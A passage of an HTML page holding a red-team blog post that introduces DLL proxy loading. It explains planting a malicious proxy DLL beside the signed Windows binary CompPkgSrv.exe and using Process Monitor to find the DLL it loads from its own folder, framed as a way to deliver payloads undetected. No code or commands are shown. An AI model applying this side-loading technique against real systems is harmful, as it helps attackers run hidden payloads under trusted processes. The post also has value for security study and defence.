<!DOCTYPE html>
<html ⚡>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">

    <title>Mastering DLL Proxy Loading: A Step-by-Step Guide</title>

    <meta name="description" content="Discussing DLL Proxy loading used by red teamers for undetectable payload delivery. This series covers implementation, C2, and lateral movement">
    <link rel="icon" href="../../content/images/2021/06/favicon.ico" type="image/x-icon">
    <link rel="canonical" href="https://h4rithd.com/blog/dll-proxy-loading">
    <meta name="referrer" content="no-referrer-when-downgrade">
    
    <meta property="og:site_name" content="h4rithd.com">
    <meta property="og:type" content="article">
    <meta property="og:title" content="Mastering DLL Proxy Loading: A Step-by-Step Guide">
    <meta property="og:description" content="Discussing DLL Proxy loading used by red teamers for undetectable payload delivery. This series covers implementation, C2, and lateral movement">
    <meta property="og:url" content="https://h4rithd.com/blog/dll-proxy-loading">
    <meta property="og:image" content="https://h4rithd.com/blog/content/images/2024/05/PostImage.jpg">
    <meta property="article:published_time" content="2024-05-16T17:15:04.000Z">
    <meta property="article:modified_time" content="2024-05-17T08:15:41.000Z">
    <meta property="article:tag" content="DLL Proxy Loading">
    <meta property="article:tag" content="h4rithd">
    <meta property="article:tag" content="h4rithd.com">
    <meta property="article:tag" content="DLL Hijacking">
    <meta property="article:tag" content="RedTeam">
    
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="Mastering DLL Proxy Loading: A Step-by-Step Guide">
    <meta name="twitter:description" content="Discussing DLL Proxy loading used by red teamers for undetectable payload delivery. This series covers implementation, C2, and lateral movement">
    <meta name="twitter:url" content="https://h4rithd.com/blog/dll-proxy-loading">
    <meta name="twitter:image" content="https://h4rithd.com/blog/content/images/2024/05/PostImage.jpg">
    <meta name="twitter:label1" content="Written by">
    <meta name="twitter:data1" content="Harith Dilshan">
    <meta name="twitter:label2" content="Filed under">
    <meta name="twitter:data2" content="DLL Proxy Loading, h4rithd, h4rithd.com, DLL Hijacking, RedTeam">
    <meta name="twitter:site" content="@h4rithd">
    <meta name="twitter:creator" content="@h4rithd">
    <meta property="og:image:width" content="1920">
    <meta property="og:image:height" content="1035">
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "h4rithd.com",
        "url": "https://h4rithd.com/blog/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2021/06/Logo.png",
            "width": 60,
            "height": 60
        }
    },
    "author": {
        "@type": "Person",
        "name": "Harith Dilshan",
        "image": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2023/11/5-1.jpeg",
            "width": 2000,
            "height": 2000
        },
        "url": "https://h4rithd.com/blog/author/h4rithd/",
        "sameAs": [
            "https://h4rithd.com/",
            "https://twitter.com/h4rithd"
        ]
    },
    "headline": "Mastering DLL Proxy Loading: A Step-by-Step Guide",
    "url": "https://h4rithd.com/blog/dll-proxy-loading/",
    "datePublished": "2024-05-16T17:15:04.000Z",
    "dateModified": "2024-05-17T08:15:41.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "https://h4rithd.com/blog/content/images/2024/05/PostImage.jpg",
        "width": 1920,
        "height": 1035
    },
    "keywords": "DLL Proxy Loading, h4rithd, h4rithd.com, DLL Hijacking, RedTeam",
    "description": "After a very long break, I am here with a different spell. Today, I am going to discuss the DLL Proxy loading method. This method is widely used by red teamers or threat actors to deliver their payload while remaining undetectable. This will be a complete series on how we can deliver this payload, implement it with a C2 framework, and perform lateral movement. However, in this first section, we will only go through the DLL proxy loading scenario. Stay tuned for the entire series.\n\n\n01. Introduct",
    "mainEntityOfPage": "https://h4rithd.com/blog/dll-proxy-loading/"
}
    </script>

    <meta name="generator" content="Ghost 5.72">
    <link rel="alternate" type="application/rss+xml" title="h4rithd.com" href="../../rss/index.html">

    <style amp-custom>
    *,
    *::before,
    *::after {
        box-sizing: border-box;
    }

    html {
        overflow-x: hidden;
        overflow-y: scroll;
        font-size: 62.5%;
        -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    }

    body {
        min-height: 100vh;
        margin: 0;
        padding: 0;
        color: #3a4145;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.7rem;
        line-height: 1.55em;
        font-weight: 400;
        font-style: normal;
        background: #fff;
        scroll-behavior: smooth;
        overflow-x: hidden;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
    }

    p,
    ul,
    ol,
    li,
    dl,
    dd,
    hr,
    pre,
    form,
    table,
    video,
    figure,
    figcaption,
    blockquote {
        margin: 0;
        padding: 0;
    }

    ul[class],
    ol[class] {
        padding: 0;
        list-style: none;
    }

    img {
        display: block;
        max-width: 100%;
    }

    input,
    button,
    select,
    textarea {
        font: inherit;
        -webkit-appearance: none;
    }

    fieldset {
        margin: 0;
        padding: 0;
        border: 0;
    }

    label {
        display: block;
        font-size: 0.9em;
        font-weight: 700;
    }

    hr {
        position: relative;
        display: block;
        width: 100%;
        height: 1px;
        border: 0;
        border-top: 1px solid currentcolor;
        opacity: 0.1;
    }

    ::selection {
        text-shadow: none;
        background: #cbeafb;
    }

    mark {
        background-color: #fdffb6;
    }

    small {
        font-size: 80%;
    }

    sub,
    sup {
        position: relative;
        font-size: 75%;
        line-height: 0;
        vertical-align: baseline;
    }
    sup {
        top: -0.5em;
    }
    sub {
        bottom: -0.25em;
    }

    ul li + li {
        margin-top: 0.6em;
    }

    a {
        color: var(--ghost-accent-color, #1292EE);
        text-decoration-skip-ink: auto;
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
        margin: 0;
        font-weight: 700;
        color: #121212;
        line-height: 1.4em;
    }

    h1 {
        font-size: 3.4rem;
        line-height: 1.1em;
    }

    h2 {
        font-size: 2.4rem;
        line-height: 1.2em;
    }

    h3 {
        font-size: 1.8rem;
    }

    h4 {
        font-size: 1.7rem;
    }

    h5 {
        font-size: 1.6rem;
    }

    h6 {
        font-size: 1.6rem;
    }

    amp-img {
        height: 100%;
        width: 100%;
        max-width: 100%;
        max-height: 100%;
    }

    amp-img img {
        object-fit: cover;
    }
    
    amp-youtube {
        height: calc(100vw / 1.78);
        width: 100vw;
        position: relative;
    }

    amp-youtube img {
        position: absolute;
    }

    .page-header {
        padding: 50px 5vmin 30px;
        text-align: center;
        font-size: 2rem;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    .page-header a {
        color: #121212;
        font-weight: 700;
        text-decoration: none;
        font-size: 1.6rem;
        letter-spacing: -0.1px;
    }

    .post {
        max-width: 680px;
        margin: 0 auto;
    }

    .post-header {
        margin: 0 5vmin 5vmin;
        text-align: center;
    }

    .post-meta {
        margin: 1rem 0 0 0;
        text-transform: uppercase;
        color: #738a94;
        font-weight: 500;
        font-size: 1.3rem;
    }

    .post-image {
        margin: 0 0 5vmin;
    }

    .post-image img {
        display: block;
        width: 100%;
        height: auto;
    }

    .post-content {
        padding: 0 5vmin;
    }

    .post-content > * + * {
        margin-top: 1.5em;
    }

    .post-content [id]:not(:first-child) {
        margin: 2em 0 0;
    }

    .post-content > [id] + * {
        margin-top: 1rem;
    }

    .post-content [id] + .kg-card,
    .post-content blockquote + .kg-card {
        margin-top: 40px;
    }

    .post-content > ul,
    .post-content > ol,
    .post-content > dl {
        padding-left: 1.9em;
    }

    .post-content hr {
        margin-top: 40px;
    }

    .post .post-content hr + * {
        margin-top: 40px;
    }

    .post-content amp-img {
        background-color: #f8f8f8;
    }

    .post-content blockquote {
        position: relative;
        font-style: italic;
    }

    .post-content blockquote::before {
        content: "";
        position: absolute;
        left: -1.5em;
        top: 0;
        bottom: 0;
        width: 0.3rem;
        background: var(--ghost-accent-color, #1292EE);
    }

    .post-content blockquote.kg-blockquote-alt {
        font-size: 1.2em;
        font-style: italic;
        line-height: 1.6em;
        text-align: center;
        color: #738a94;
        padding: 0.75em 3em 1.25em;
    }

    .post-content blockquote.kg-blockquote-alt::before {
        display: none;
    }

    .post-content :not(.kg-card):not([id]) + .kg-card {
        margin-top: 40px;
    }

    .post-content .kg-card + :not(.kg-card) {
        margin-top: 40px;
    }

    .kg-card figcaption {
        padding: 1.5rem 1.5rem 0;
        text-align: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.4em;
        opacity: 0.6;
    }

    .kg-card figcaption strong {
        color: rgba(0,0,0,0.8);
    }

    .post-content :not(pre) code {
        vertical-align: middle;
        padding: 0.15em 0.4em 0.15em;
        border: #e1eaef 1px solid;
        font-weight: 400;
        font-size: 0.9em;
        line-height: 1em;
        color: #15171a;
        background: #f0f6f9;
        border-radius: 0.25em;
    }

    .post-content > pre {
        overflow: scroll;
        padding: 16px 20px;
        color: #fff;
        background: #1F2428;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0,0,0,.1), 0 0 1px rgba(0,0,0,.4);
    }

    .kg-embed-card {
        display: flex;
        flex-direction: column;
        align-items: center;
        width: 100%;
    }

    .kg-image-card img {
        margin: auto;
    }

    .kg-gallery-card + .kg-gallery-card {
        margin-top: 0.75em;
    }

    .kg-gallery-container {
        position: relative;
    }

    .kg-gallery-row {
        display: flex;
        flex-direction: row;
        justify-content: center;
    }

    .kg-gallery-image {
        width: 100%;
        height: 100%;
    }

    .kg-gallery-row:not(:first-of-type) {
        margin: 0.75em 0 0 0;
    }

    .kg-gallery-image:not(:first-of-type) {
        margin: 0 0 0 0.75em;
    }

    .kg-bookmark-card,
    .kg-bookmark-publisher {
        position: relative;
    }

    .kg-bookmark-container,
    .kg-bookmark-container:hover {
        display: flex;
        flex-wrap: wrap;
        flex-direction: row-reverse;
        color: currentColor;
        background: rgba(255,255,255,0.6);
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        text-decoration: none;
        border-radius: 3px;
        box-shadow: 0 2px 6px -2px rgba(0, 0, 0, 0.1), 0 0 1px rgba(0, 0, 0, 0.4);
        overflow: hidden;
    }

    .kg-bookmark-content {
        flex-basis: 0;
        flex-grow: 999;
        padding: 20px;
        order: 1;
    }

    .kg-bookmark-title {
        font-weight: 600;
        font-size: 1.5rem;
        line-height: 1.3em;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        max-height: 45px;
        margin: 0.5em 0 0 0;
        font-size: 1.4rem;
        line-height: 1.55em;
        overflow: hidden;
        opacity: 0.8;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
    }

    .kg-bookmark-metadata {
        margin-top: 20px;
    }

    .kg-bookmark-metadata {
        display: flex;
        align-items: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.3em;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        -webkit-box-orient: vertical;
        -webkit-line-clamp: 2;
        overflow: hidden;
    }

    .kg-bookmark-metadata amp-img {
        width: 18px;
        height: 18px;
        max-width: 18px;
        max-height: 18px;
        margin-right: 10px;
    }

    .kg-bookmark-thumbnail {
        display: flex;
        flex-basis: 20rem;
        flex-grow: 1;
        justify-content: flex-end;
    }

    .kg-bookmark-thumbnail amp-img {
        max-height: 200px;
    }

    .kg-bookmark-author {
        white-space: nowrap;
        text-overflow: ellipsis;
        overflow: hidden;
    }

    .kg-bookmark-publisher::before {
        content: "•";
        margin: 0 .5em;
    }

    .kg-toggle-card-icon {
        display: none;
    }

    .kg-toggle-content {
        margin-top: 0.8rem;
    }

    .kg-product-card-container {
        background: transparent;
        padding: 20px;
        width: 100%;
        border-radius: 5px;
        box-shadow: inset 0 0 0 1px rgb(124 139 154 / 25%);
    }

    .kg-product-card-description p {
        margin-top: 1.5em;
    }

    .kg-product-card-description ul {
        margin-left: 24px;
    }

    .kg-product-card-title {
        font-size: 1.9rem;
        font-weight: 700;
    }

    .kg-product-card-rating-star {
        height: 28px;
        width: 20px;
        margin-right: 2px;
    }

    .kg-product-card-rating-star svg {
    width: 16px;
    height: 16px;
    fill: currentColor;
    opacity: 0.15;
    }

    .kg-product-card-rating-active.kg-product-card-rating-star svg {
    opacity: 1;
    }

    .kg-nft-card-container {
        position: relative;
        display: flex;
        flex: auto;
        flex-direction: column;
        text-decoration: none;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.4rem;
        font-weight: 400;
        box-shadow: 0 2px 6px -2px rgb(0 0 0 / 10%), 0 0 1px rgb(0 0 0 / 40%);
        width: 100%;
        max-width: 512px;
        color: #15212A;
        background: #fff;
        border-radius: 5px;
        transition: none;
        margin: 0 auto;
    }

    .kg-nft-metadata {
        padding: 2.0rem;
    }

    .kg-nft-image-container {
        position: relative;
    }

    .kg-nft-image {
        display: flex;
        border-radius: 5px 5px 0 0;
    }

    .kg-nft-header {
        display: flex;
        justify-content: space-between;
        align-items: flex-start;
        gap: 20px;
    }

    .kg-nft-header h4.kg-nft-title {
        font-size: 1.9rem;
        font-weight: 700;
        margin: 0;
        color: #15212A;
    }

    .kg-nft-header amp-img {
        max-width: 114px;
        max-height: 26px;
    }

    .kg-nft-opensea-logo {
        margin-top: 2px;
        width: 100px;
    }

    .kg-nft-creator {
        font-family: inherit;
        color: #95A1AD;
    }

    .kg-nft-creator span {
        font-weight: 500;
        color: #15212A;
    }

    .kg-nft-card p.kg-nft-description {
        font-size: 1.4rem;
        line-height: 1.4em;
        margin: 2.0rem 0 0;
        color: #222;
    }

    .kg-button-card {
        display: flex;
        position: static;
        align-items: center;
        width: 100%;
        justify-content: center;
    }

    .kg-btn {
        display: flex;
        position: static;
        align-items: center;
        padding: 0 2.0rem;
        height: 4.0rem;
        line-height: 4.0rem;
        font-size: 1.65rem;
        font-weight: 600;
        text-decoration: none;
        border-radius: 5px;
        transition: opacity 0.2s ease-in-out;
    }

    .kg-btn:hover {
        opacity: 0.85;
    }

    .kg-btn-accent {
        background-color: var(--ghost-accent-color, #1292EE);
        color: #fff;
    }

    .kg-callout-card {
        display: flex;
        padding: 20px 28px;
        border-radius: 3px;
    }

    .kg-callout-card-grey {
        background: rgba(124, 139, 154, 0.13);
    }

    .kg-callout-card-white {
        background: transparent;
        box-shadow: inset 0 0 0 1px rgba(124, 139, 154, 0.25);
    }

    .kg-callout-card-blue {
        background: rgba(33, 172, 232, 0.12);
    }

    .kg-callout-card-green {
        background: rgba(52, 183, 67, 0.12);
    }

    .kg-callout-card-yellow {
        background: rgba(240, 165, 15, 0.13);
    }

    .kg-callout-card-red {
        background: rgba(209, 46, 46, 0.11);
    }

    .kg-callout-card-pink {
        background: rgba(225, 71, 174, 0.11);
    }

    .kg-callout-card-purple {
        background: rgba(135, 85, 236, 0.12);
    }

    .kg-callout-card-accent {
        background: var(--ghost-accent-color);
        color: #fff;
    }

    .kg-callout-card-accent a {
        color: #fff;
    }

    .kg-callout-emoji {
        padding-right: 16px;
        line-height: 1.3;
        font-size: 1.25em;
    }

    .kg-header-card {
        padding: 6em 3em;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        text-align: center;
    }

    .kg-header-card.kg-size-small {
        padding-top: 4em;
        padding-bottom: 4em;
    }

    .kg-header-card.kg-size-large {
        padding-top: 12em;
        padding-bottom: 12em;
    }

    .kg-header-card.kg-width-full {
        padding-left: 4em;
        padding-right: 4em;
    }

    .kg-header-card.kg-align-left {
        text-align: left;
        align-items: flex-start;
    }

    .kg-header-card.kg-style-dark {
        background: #15171a;
        color: #ffffff;
    }

    .kg-header-card.kg-style-light {
        color: #15171a;
        border: 1px solid rgba(124, 139, 154, 0.25);
        border-width: 1px 0;
    }

    .kg-header-card.kg-style-accent {
        background-color: var(--ghost-accent-color);
    }

    .kg-header-card.kg-style-image {
        background-color: #e7e7eb;
        background-size: cover;
        background-position: center center;
    }

    .kg-header-card h2 {
        font-size: 4em;
        font-weight: 700;
        line-height: 1.1em;
        margin: 0;
    }

    .kg-header-card h2 strong {
        font-weight: 800;
    }

    .kg-header-card.kg-size-small h2 {
        font-size: 3em;
    }

    .kg-header-card.kg-size-large h2 {
        font-size: 5em;
    }

    .kg-header-card h3 {
        font-size: 1.25em;
        font-weight: 500;
        line-height: 1.3em;
        margin: 0;
    }

    .kg-header-card h3 strong {
        font-weight: 600;
    }

    .kg-header-card.kg-size-small h3 {
        font-size: 1em;
    }

    .kg-header-card.kg-size-large h3 {
        font-size: 1.5em;
    }

    .kg-header-card:not(.kg-style-light) h2,
    .kg-header-card:not(.kg-style-light) h3 {
        color: #ffffff;
    }

    .kg-header-card a.kg-header-card-button {
        display: flex;
        position: static;
        align-items: center;
        padding: 0 1.2em;
        height: 2.4em;
        line-height: 1em;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-size: 0.95em;
        font-weight: 600;
        text-decoration: none;
        border-radius: 5px;
        transition: opacity 0.2s ease-in-out;
        background-color: var(--ghost-accent-color);
        color: #ffffff;
        margin: 1.75em 0 0;
    }

    .kg-header-card a.kg-header-card-button:hover {
        opacity: 0.85;
    }

    .kg-header-card.kg-size-large a.kg-header-card-button {
        margin-top: 2em;
    }

    .kg-header-card.kg-size-small a.kg-header-card-button {
        margin-top: 1.5em;
    }

    .kg-header-card.kg-style-image a.kg-header-card-button,
    .kg-header-card.kg-style-dark a.kg-header-card-button {
        background: #ffffff;
        color: #15171a;
    }

    .kg-header-card.kg-style-accent a.kg-header-card-button {
        background: #ffffff;
        color: var(--ghost-accent-color);
    }

    .kg-audio-card {
        display: flex;
        width: 100%;
        box-shadow: inset 0 0 0 1px rgba(124, 139, 154, 0.25);
    }

    .kg-audio-thumbnail {
        display: flex;
        justify-content: center;
        align-items: center;
        width: 80px;
        min-width: 80px;
        height: 80px;
        background: transparent;
        object-fit: cover;
        aspect-ratio: 1/1;
        border-radius: 3px 0 0 3px;
    }

    .kg-audio-thumbnail.placeholder {
        background: var(--ghost-accent-color);
    }

    .kg-audio-thumbnail.placeholder svg {
        width: 24px;
        height: 24px;
        fill: white;
    }

    .kg-audio-player-container {
        position: relative;
        display: flex;
        flex-direction: column;
        justify-content: space-between;
        width: 100%;
        --seek-before-width: 0%;
        --volume-before-width: 100%;
        --buffered-width: 0%;
    }

    .kg-audio-title {
        width: 100%;
        padding: 8px 12px 0;
        border: none;
        font-family: inherit;
        font-size: 1.1em;
        font-weight: 700;
        background: transparent;
    }

    .kg-audio-player {
        display: none;
    }

    .kg-width-full.kg-card-hascaption {
        display: grid;
        grid-template-columns: inherit;
    }

    .post-content table {
        border-collapse: collapse;
        width: 100%;
    }

    .post-content th {
        padding: 0.5em 0.8em;
        text-align: left;
        font-size: .75em;
        text-transform: uppercase;
    }

    .post-content td {
        padding: 0.4em 0.7em;
    }

    .post-content tbody tr:nth-child(2n + 1) {
        background-color: rgba(0,0,0,0.1);
        padding: 1px;
    }

    .post-content tbody tr:nth-child(2n + 2) td:last-child {
        box-shadow:
            inset 1px 0 rgba(0,0,0,0.1),
            inset -1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:nth-child(2n + 2) td {
        box-shadow: inset 1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:last-child {
        border-bottom: 1px solid rgba(0,0,0,.1);
    }

    .page-footer {
        padding: 60px 5vmin;
        margin: 60px auto 0;
        text-align: center;
        background-color: #f8f8f8;
    }

    .page-footer h3 {
        margin: 0.5rem 0 0 0;
    }

    .page-footer p {
        max-width: 500px;
        margin: 1rem auto 1.5rem;
        font-size: 1.7rem;
        line-height: 1.5em;
        color: rgba(0,0,0,0.6)
    }

    .powered {
        display: inline-flex;
        align-items: center;
        margin: 30px 0 0;
        padding: 6px 9px 6px 6px;
        border: rgba(0,0,0,0.1) 1px solid;
        font-size: 12px;
        line-height: 12px;
        letter-spacing: -0.2px;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-weight: 500;
        color: #222;
        text-decoration: none;
        background: #fff;
        border-radius: 6px;
    }

    .powered svg {
        height: 16px;
        width: 16px;
        margin: 0 6px 0 0;
    }

    @media (max-width: 600px) {
        body {
            font-size: 1.6rem;
        }
        h1 {
            font-size: 3rem;
        }

        h2 {
            font-size: 2.2rem;
        }
    }

    @media (max-width: 400px) {
        h1 {
            font-size: 2.6rem;
            line-height: 1.15em;
        }
        h2 {
            font-size: 2rem;
            line-height: 1.2em;
        }
        h3 {
            font-size: 1.7rem;
        }
    }

    :root {--ghost-accent-color: #0065a3;}
    </style>

    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    

</head>

<body class="amp-template">
    <header class="page-header">
        <a href="../../index.html">
                <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed" alt="h4rithd.com"></amp-img>
        </a>
    </header>

    <main class="content" role="main">
        <article class="post">

            <header class="post-header">
                <h1 class="post-title">Mastering DLL Proxy Loading | 0x01</h1>
                <section class="post-meta">
                    Harith Dilshan -
                    <time class="post-date" datetime="2024-05-16">16 May 2024</time>
                </section>
            </header>
            <figure class="post-image">
                <amp-img src="https://h4rithd.com/blog/content/images/2024/05/PostImage.jpg" width="600" height="340" layout="responsive" 
                alt="Mastering DLL Proxy Loading | 0x01"
                ></amp-img>
            </figure>
            <section class="post-content">

                <p>After a very long break, I am here with a different spell. Today, I am going to discuss the DLL Proxy loading method. This method is widely used by red teamers or threat actors to deliver their payload while remaining undetectable. This will be a complete series on how we can deliver this payload, implement it with a C2 framework, and perform lateral movement. However, in this first section, we will only go through the DLL proxy loading scenario. Stay tuned for the entire series.</p><h2 id="01-introduction">01. Introduction </h2><p>Before I start, let me explain how a typical application loads external functions for third-party libraries like DLLs.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-31.png" class="kg-image" width="1686" height="540" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-31.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-31.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-31.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-31.png 1686w" layout="responsive"></amp-img></figure><p>As explained in the image above, the application fetches data upon startup using a third-party function called <code>GetExtraData()</code>. This function exists within the dynamic link library <code>ExtraFunctions.dll</code> located in the same working directory of the application. Because the <code>GetExtraData()</code> function is within the DLL file, the application runs normally.</p><p>Okay, what is DLL Proxy loading, then? </p><p>What if we rename the <code>ExtraFunctions.dll</code> to <code>OtherFunction.dll</code> and create a new <code>ExtraFunctions.dll</code> with our custom code to link those files. When the application tries to fetch data, <code>ExtraFunctions.dll</code> will retrieve it from <code>OtherFunction.dll</code> while also running our tasks. Here is a picture of the demonstration.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-32.png" class="kg-image" width="1600" height="1064" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-32.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-32.png 1000w, https://h4rithd.com/blog/content/images/2024/05/image-32.png 1600w" layout="responsive"></amp-img></figure><p>When the application starts up, it will attempt to fetch data using the <code>GetExtraData()</code> function from the <code>ExtraFunctions.dll</code>. However, instead of the original file, it will try to retrieve data from our malicious DLL file that we created as <code>ExtraFunctions.dll</code>. It linked the functions as export links from the legitimate DLL call <code>OtherFunction.dll</code>, allowing the application to run smoothly while we drop our payload into the memory. Furthermore, all files are located within the same directory</p><h2 id="02-getting-start">02. Getting start </h2><p>Choosing the right executable for this scenario is more challenging than creating the exploit. We need to select an executable with a size less than 8MB, ideally around 3MB, that is digitally signed by a legitimate, well-known entity. Additionally, it should load a low number of DLLs unsafely at runtime. Therefore, we need to conduct research on multiple executables, but fortunately, I am lucky here.</p><p>To demonstrate this example, I want to obtain the executable from the Windows system itself because it is a legitimate binary and is signed by an authorized entity, mostly Microsoft. In order to accomplish this, I searched through the Windows system32 folder and found a small executable called <code>CompPkgSrv.exe</code> that can be used easily to achieve this. </p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-4.png" class="kg-image" width="2410" height="1152" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-4.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-4.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-4.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-4.png 2400w" layout="responsive"></amp-img></figure><p>The <code>CompPkgSrv.exe</code>, also known as the Component Package Support Server, is a legitimate Microsoft program responsible for managing and processing package deployment and installation for the Windows Store. You can upload the exe file to VirusTotal to confirm that there are no malicious signatures on it.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image.png" class="kg-image" width="1328" height="211" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image.png 1000w, https://h4rithd.com/blog/content/images/2024/05/image.png 1328w" layout="responsive"></amp-img></figure><p>My first step was to create a new folder and copy the <code>CompPkgSrv.exe</code> binary into that folder. Then,I started the <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon?ref=192.168.184.133">Process Monitor</a> application to view the process. Once the Process Monitor was open, I set the filter to display only the activity for the <code>CompPkgSrv.exe</code> binary.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-5.png" class="kg-image" width="2846" height="1418" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-5.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-5.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-5.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-5.png 2400w" layout="responsive"></amp-img></figure><p>Since we are only focused on the DLL, we can filter by path as shown below.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-6.png" class="kg-image" width="2846" height="1418" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-6.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-6.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-6.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2024/05/image-6.png 2400w" layout="responsive"></amp-img></figure><p>Since we are only focused on the system file activity, we set the filter as shown in the image below.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-8.png" class="kg-image" width="722" height="260" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-8.png 600w, https://h4rithd.com/blog/content/images/2024/05/image-8.png 722w" layout="responsive"></amp-img></figure><p>Then we are ready to determine which DLLs this binary is using. To do so, we can run our <code>CompPkgSrv.exe</code> binary file and monitor the process activity using Process Monitor.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-9.png" class="kg-image" width="2158" height="1586" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-9.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-9.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-9.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-9.png 2158w" layout="responsive"></amp-img></figure><p>In the picture above, you can see that the binary is searching for a DLL named <code>CompPkgSup.DLL</code> in our current directory. Since it is not found in our current folder, it will retrieve the DLL from the <code>system32</code> folder. Let's apply a filter to <code>CompPkgSup.DLL</code> and view the output clearly.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-10.png" class="kg-image" width="2042" height="1318" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-10.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-10.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-10.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-10.png 2042w" layout="responsive"></amp-img></figure><p>Now we can see the clear output.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2024/05/image-12.png" class="kg-image" width="1956" height="508" srcset="https://h4rithd.com/blog/content/images/size/w600/2024/05/image-12.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2024/05/image-12.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2024/05/image-12.png 1600w, https://h4rithd.com/blog/content/images/2024/05/image-12.png 1956w" layout="responsive"></amp-img></figure><p>Let's copy the <code>CompPkgSup.DLL</code> into our current folder, clear the current output in the processes monitor, and then run the DLL again to verify this scenario.</p><figure class="kg-card kg-image-card"><amp-img 